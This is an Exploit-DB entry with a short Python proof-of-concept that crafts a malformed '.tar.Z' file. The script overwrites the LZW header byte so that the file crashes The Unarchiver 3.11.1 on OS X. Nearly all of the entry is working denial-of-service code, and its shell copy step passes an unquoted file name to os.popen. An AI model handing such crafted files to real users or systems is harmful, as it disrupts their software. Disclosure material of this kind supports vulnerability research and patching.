The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)

EDB-ID:

40570

CVE:

N/A


Author:

Antonio Z.

Type:

dos


Platform:

OSX

Date:

2016-10-18


# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
# Date: 10-17-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
# Version: 3.11.1
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12

# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h

import os, struct, sys
from mmap import mmap

if len(sys.argv) <= 1:
    print "Usage: python Local_Crash_PoC.py [file name]"
    exit()

file_name = sys.argv[1]
file_mod = open(file_name, 'r+b')
file_hash = file_mod.read()

def get_extension(file_name):
    basename = os.path.basename(file_name)
    extension = '.'.join(basename.split('.')[1:])
    return '.' + extension if extension else None

def file_maping():
    maping = mmap(file_mod.fileno(),0)
    maping.seek(2)
    maping.write_byte(struct.pack('B', 255))
    maping.close()
    
new_file_name = "Local_Crash_PoC" + get_extension(file_name)
    
os.popen('cp ' + file_name + ' ' + new_file_name)
file_mod = open(new_file_name, 'r+b')
file_maping()
file_mod.close()
print '[+] ' + 'Created file: ' + new_file_name